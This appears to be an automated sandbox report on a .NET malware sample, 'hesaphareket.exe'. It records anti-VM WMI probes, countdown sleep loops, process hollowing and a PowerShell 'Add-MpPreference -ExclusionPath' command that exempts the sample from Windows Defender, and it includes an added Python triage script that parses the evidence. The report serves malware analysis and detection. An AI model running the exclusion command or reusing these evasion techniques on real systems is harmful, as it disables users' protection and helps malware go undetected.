                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, DB0rNXPAoLV4WyNjdF.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Btx9rWtq5b', 'uk39cmRRUK', 'nVq9zCv56U', 'LhcEoH7eWo', 'VDbEl4vON2', 'Q1OE9ahaST', 'P8AEED9J2P', 'Th6iW7dHfFQ6X7FOrT1'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, W6NSRHll0U5bw9XC3tb.cs | High entropy of concatenated method names: 'LHTZcPLMbY', 'YT6ZzHsRVl', 'WILdoL70ZS', 'vp2dlVI7lK', 'cWLd9J2e7Z', 'zFpdEYVYkx', 'BwJdF02pI2', 'f6qd0Yo2CR', 'WgkdbJ50Ie', 'EqkdpdRWoK'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, mOIpKGlo1GpcENTKgBe.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GM5ZXgwT8a', 'fCsZffsj7E', 'g8mZ4R0GMB', 'YcIZeapJEL', 'GaCZWrRB3W', 'w5WZKryDVk', 'Q5PZHKI12j'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, U5httJGmuF5DPKTAnl.cs | High entropy of concatenated method names: 'WODpeODi3m', 'GU8pWccfKI', 'apepK3ZAWY', 'GclpHrqgKp', 'FGCpUYRnmL', 'tpIp8ovbEr', 'lcKpiIp4fD', 'buCpkHPPDM', 'hYiprDfCyQ', 'MLGpcFOgmI'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, RLmREhrq916NQ96X43.cs | High entropy of concatenated method names: 'EHQ1Sxwyti', 'Xga12LXQfU', 'U121N6YEQG', 'B8G1Qh1yH1', 'QUu1q9YoU5', 'Cde15S03Wo', 'Sfv1V00Agu', 'GIx1O5w1nW', 'VVs1DPEU4G', 'mmN17HELdn'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, lexLvIJdiNy80Kiycs.cs | High entropy of concatenated method names: 'EWWPBpBiCK', 'Hk8PydWYOm', 'mWoPG0mI62', 'NHKPJtTT9m', 'VI7PnSMCtY', 'rlMPuoBInv', 'Ya6PwSLbbs', 'zd2PIC8V70', 'b5OP1eN3UF', 'qHxPZxbwkP'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, aeCmgZzr3lXS43K00w.cs | High entropy of concatenated method names: 'xckZyDXYyE', 'DyWZG6Mvsu', 'puYZJpgQxs', 'IdEZSDsMwh', 'k3NZ29vhln', 'EKVZQy3SqN', 'FyAZqixl5F', 'dXsZa94APC', 'X2ZZCpaORR', 'fdhZYv6asd'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.cs | High entropy of concatenated method names: 'MtvE0N5Uva', 'dPsEbaNTHk', 'j8mEpuSoav', 'x5mEPiWnjc', 'SttEtgqnFw', 'pkCE6QwIfe', 'NhNELQ5kc4', 'MRGEjRuQWx', 'MQYE3V4rXg', 'j3mETGE6WI'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, ieSK5kStrek0doClXM.cs | High entropy of concatenated method names: 'uWQ60t4aX5', 'Kst6pS8WTS', 'RvU6tFa134', 'EQX6LjqvX2', 'WaV6jpo3wX', 'oohtUKCr8N', 'oCIt8YHeot', 'CyNtiZFkEO', 'z26tk66smp', 'jdJtrAI7BE'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, jcgak2caNw4QSExh2A.cs | High entropy of concatenated method names: 'MyLZPiu4sj', 'M0rZtTVits', 'NwlZ6wuld5', 'HyBZLTsctw', 'aOZZ1SEAQE', 'quGZjPlNBC', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, p05yAfxmLTNU99P8HE.cs | High entropy of concatenated method names: 'He0tm93yN4', 'KxntAQlgIe', 'mT1PN91UAd', 'ELmPQSAsDj', 'rJcPq9XBrE', 'U4GP5VnYBe', 'Mp8PVWqfeg', 'fstPOWhkM1', 'J3CPDaUpnl', 'T9bP7rba57'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, mOLxEjDHWYc8XOHddC.cs | High entropy of concatenated method names: 'yd9LCR8u1n', 'U1cLYEpKjY', 'zAyLgVFVd2', 'RkwLBrvS1W', 'TGJLmUihiN', 'eqfLyMprRc', 'gKcLAnXMZa', 'SXdLG5KSjJ', 'B89LJ0PGoI', 'BHmLxfYVLU'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, hjyEGc4iSUQJitRU4D.cs | High entropy of concatenated method names: 'hEohGFWLcN', 'TEuhJPQGQ5', 'WWohSIhZit', 'uPkh2qFAi8', 'isjhQiZQTY', 'rpHhqXXaaK', 'JiGhVyilRt', 'tGGhOJTOYq', 'rCbh7Ulimm', 'jAphXfmpak'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, SlnkX0H8ePrsk99m6e.cs | High entropy of concatenated method names: 'NG5wTXIC85', 'FBXwvQBpDc', 'ToString', 'w4uwbey0gE', 'EZlwpqQXuY', 'Sj2wP3bmof', 'qlbwtKWbM7', 'Y1Zw6bta4Q', 'clSwLgsdHr', 'RRUwjchwIp'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, ibdPOaiOutWPyPGkXx.cs | High entropy of concatenated method names: 'OKV1nk4AnC', 'nHY1wiAMmF', 'f7o113tFhg', 'cZL1dkG9cI', 'wI01sowF27', 'S571axP4Bu', 'Dispose', 'DcdIbSkpup', 'xHeIptMuaX', 'Wa0IPHpr2o'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, hDpkvMpdbBM5WBbgWJ.cs | High entropy of concatenated method names: 'Dispose', 'hWPlryPGkX', 'EwI92jJoDR', 'zWWNV9QVqo', 'F4plcP3BnE', 'RaTlz0phgO', 'ProcessDialogKey', 'pbe9oLmREh', 'J919l6NQ96', 'O4399Lcgak'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, fXVa8kFOIcYK3XNYlr.cs | High entropy of concatenated method names: 'HqUlL5httJ', 'BuFlj5DPKT', 'qdilTNy80K', 'Vyclvsu05y', 'bP8lnHE6eS', 'S5klutrek0', 'DgqkD1NxNqBfkUtTIa', 'rmDoFBmw3a6ero2pC3', 'E9HllxmuOj', 'VP7lENrISR'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, TJDjG497EqNjuMFx6Z.cs | High entropy of concatenated method names: 'u3UgKC4yB', 'YlqBxendn', 'Tu0ybaZt0', 'US0AR1lmQ', 'WK3JQNcv9', 'nYwxcukjr', 'qSBeSl7BZjVK8weRGs', 'suxM4FpgqBCmf8p6hc', 'ISfsPv4GoKOnR7gMrQ', 'vSIIZ4ETe'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Oxe9Fwe6IFE8xU8ZF3.cs | High entropy of concatenated method names: 'aaQn7AefGP', 'YqHnfZPywl', 'JXKneBAPRi', 'MAlnWLAchr', 'mRLn2VKa0T', 'OMCnNCCo3V', 'KbxnQygTqc', 'Cfxnq8hU3l', 'FlJn5db8A1', 'LREnV8Vt6x'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, uvYZ8UlFZYq1wXdFnMx.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Lu0M1Flf3i', 'vMdMZPKKkW', 'hLjMdAaFYk', 'gtJMMRYbjp', 'fZcMsUjIKA', 'WPmMRPuJZy', 'WItMaiMF0P'

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: hesaphareket.exe PID: 6188, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\hesaphareket.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Memory allocated: B30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Memory allocated: 25D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Memory allocated: 45D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Memory allocated: 75E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Memory allocated: 85E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Memory allocated: 87A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Memory allocated: 97A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Memory allocated: 2B00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Memory allocated: 2CA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1200000
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1199875
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1199766
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1199641
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1199516
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1199406
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1199297
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1199188
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1199063
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1198952
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1198828
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1198719
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1198609
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1198498
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1198390
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1198281
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1198147
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1198004
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1197844
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1197734
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1197610
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1197485
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Thread delayed: delay time: 1197375
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197235Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197125Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197016Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196906Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196797Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196688Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196578Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196465Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196359Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196250Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196141Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196016Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195906Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195797Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195687Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195578Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195465Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195360Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195249Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195141Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195016Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194891Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194781Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194672Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194562Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194449Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194344Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194234Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6155
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2824
Source: C:\Users\user\Desktop\hesaphareket.exe - Window / User API: threadDelayed 1761
Source: C:\Users\user\Desktop\hesaphareket.exe - Window / User API: threadDelayed 8084
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 5472 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372 - Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7344 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep count: 39 > 30
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7576 - Thread sleep count: 1761 > 30
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1199875s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7576 - Thread sleep count: 8084 > 30
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1199766s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1199641s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1199516s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1199406s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1199297s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1199188s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1199063s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1198952s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1198828s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1198719s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1198609s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1198498s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1198390s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1198281s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1198147s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1198004s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1197844s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1197734s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1197610s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1197485s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1197375s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1197235s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1197125s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1197016s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1196906s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1196797s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1196688s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1196578s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1196465s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1196359s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1196250s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1196141s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1196016s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1195906s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1195797s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1195687s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1195578s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1195465s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1195360s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1195249s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1195141s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1195016s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1194891s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1194781s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1194672s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1194562s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1194449s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1194344s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572 - Thread sleep time: -1194234s >= -30000s
Source: C:\Users\user\Desktop\hesaphareket.exe - WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\hesaphareket.exe - WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\hesaphareket.exe - WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: hesaphareket.exe, 00000000.00000002.1330138816.0000000000824000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: hesaphareket.exe, 00000000.00000002.1330138816.0000000000824000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\"
Source: hesaphareket.exe, 00000007.00000002.3771616968.00000000010D7000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\hesaphareket.exe - Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
Source: C:\Users\user\Desktop\hesaphareket.exe - Process token adjusted: Debug
Source: C:\Users\user\Desktop\hesaphareket.exe - Memory allocated: page read and write | page guard
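The evidence above is a raw event list; what an analyst wants from it is a few numbers. Three details matter when reading it. First, 922337203685477 is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks / 10,000), the length the .NET runtime reports for an effectively infinite wait, so it is a runtime sentinel rather than a delay the sample chose. Second, the 1200000, 1199875, 1199766 ... series is a single 20-minute target re-requested 55 times, each request shorter by roughly the time the previous iteration took; that is consistent with a loop that recomputes the remaining sleep from a wall clock, which a sandbox that fast-forwards Sleep() without advancing the clock cannot satisfy. Third, MEM_WRITE_WATCH reservations are something the .NET garbage collector does on its own heap, so for a managed sample that signature is usually runtime noise and the regions should be reported, not scored. The script below is an added example written for this report, not code from the sandbox or from the sample: it parses evidence lines in the form shown above (with or without the "Jump to behavior" link text that rides along when copying from the Joe Sandbox UI), reduces them to those numbers, and flags the countdown pattern. The input is a constructed subset of this report's lines, and the VM_PROBE_CLASSES list is the author's assumption.

```python
"""Triage helper for Joe Sandbox 'Malware Analysis System Evasion' evidence.

Added example, not part of the sandbox report or of the sample. It turns the
evidence lines into: how much wall-clock the sample tries to burn, whether it
re-arms a countdown sleep, which regions were reserved with MEM_WRITE_WATCH,
and which WMI classes it probes for VM vendor strings.
"""
import re
from collections import Counter

# .NET infinite waits are reported as TimeSpan.MaxValue in ms
# (Int64.MaxValue ticks / 10_000); a runtime sentinel, not a chosen delay.
INFINITE_MS = 922_337_203_685_477
LONG_SLEEP_MS = 3 * 60 * 1000          # the report's own ">= 3 min" threshold

# WMI classes sandbox-aware malware compares against VM vendor strings.
# Assumed list: the classes queried above plus the usual suspects.
VM_PROBE_CLASSES = {"Win32_BaseBoard", "Win32_Processor", "Win32_NetworkAdapter",
                    "Win32_ComputerSystem", "Win32_BIOS", "Win32_DiskDrive"}

_SRC = re.compile(r"^Source: (\S+)")
_DELAY = re.compile(r"Thread delayed: delay time: (\d+)")
_WATCH = re.compile(r"Memory allocated: ([0-9A-F]+) memory reserve \| memory write watch")
_WMI = re.compile(r"WMI Queries: .*?root\\cimv2 : (?:SELECT .* FROM )?(Win32_\w+)")


def parse_evidence(lines):
    """Return one (source, kind, value) record per recognised evidence line."""
    out = []
    for raw in lines:
        line = raw.strip().removesuffix("Jump to behavior")   # UI link residue
        m = _SRC.match(line)
        src = m.group(1) if m else "?"
        if (d := _DELAY.search(line)):
            out.append((src, "delay", int(d.group(1))))
        elif (w := _WATCH.search(line)):
            out.append((src, "write_watch", int(w.group(1), 16)))
        elif (q := _WMI.search(line)):
            out.append((src, "wmi", q.group(1)))
    return out


def countdown_run(delays, max_step_ms=1000):
    """Length of the longest run of strictly decreasing delays with a small step.

    A long run means Sleep() is re-armed with 'remaining = target - elapsed':
    the sample is checking a wall clock, which sandboxes that merely shorten
    sleeps cannot fake.  Returns 0 for fewer than two delays.
    """
    if len(delays) < 2:
        return 0
    best = run = 1
    for a, b in zip(delays, delays[1:]):
        run = run + 1 if 0 < a - b <= max_step_ms else 1
        best = max(best, run)
    return best


def summarize(records):
    delays = [v for _, k, v in records if k == "delay"]
    finite = [d for d in delays if d != INFINITE_MS]   # drop the .NET sentinel
    wmi = Counter(v for _, k, v in records if k == "wmi")
    return {
        "infinite_waits": delays.count(INFINITE_MS),
        "long_sleeps": sum(1 for d in finite if d >= LONG_SLEEP_MS),
        "max_sleep_min": round(max(finite, default=0) / 60_000, 1),
        "countdown_run": countdown_run(finite),
        # .NET's GC reserves its heap with MEM_WRITE_WATCH: report, don't score.
        "write_watch_regions": sorted({v for _, k, v in records if k == "write_watch"}),
        "vm_probe_classes": sorted(c for c in wmi if c in VM_PROBE_CLASSES),
        "sources": sorted({s for s, _, _ in records}),
    }


# Constructed input: a few lines copied from this report, plus the 55-step
# 1200000 -> 1194234 countdown regenerated with the ~105 ms step seen above.
SAMPLE = [
    r"Source: C:\Users\user\Desktop\hesaphareket.exe Memory allocated: 85E0000 memory reserve | memory write watchJump to behavior",
    r"Source: C:\Users\user\Desktop\hesaphareket.exe Memory allocated: 2B00000 memory reserve | memory write watchJump to behavior",
    r"Source: C:\Users\user\Desktop\hesaphareket.exe Thread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Users\user\Desktop\hesaphareket.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\Desktop\hesaphareket.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
] + [rf"Source: C:\Users\user\Desktop\hesaphareket.exe Thread delayed: delay time: {1_200_000 - 105 * i}Jump to behavior"
     for i in range(55)]

if __name__ == "__main__":
    for key, val in summarize(parse_evidence(SAMPLE)).items():
        print(f"{key:20} {val}")
```

On the lines above this yields 2 infinite waits, 55 long sleeps with a 20-minute maximum, a 55-step countdown run, two write-watch regions and the two WMI classes. Only the "Thread delayed" form is parsed; the "Thread sleep time: -N" lines are the same calls in the sandbox's relative-time notation and would double-count them.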

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\hesaphareket.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"
Source: C:\Users\user\Desktop\hesaphareket.exe - Memory written: C:\Users\user\Desktop\hesaphareket.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\hesaphareket.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"
Source: C:\Users\user\Desktop\hesaphareket.exe - Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
Source: C:\Users\user\Desktop\hesaphareket.exe - Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
Source: C:\Users\user\Desktop\hesaphareket.exe - Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Users\user\Desktop\hesaphareket.exe VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
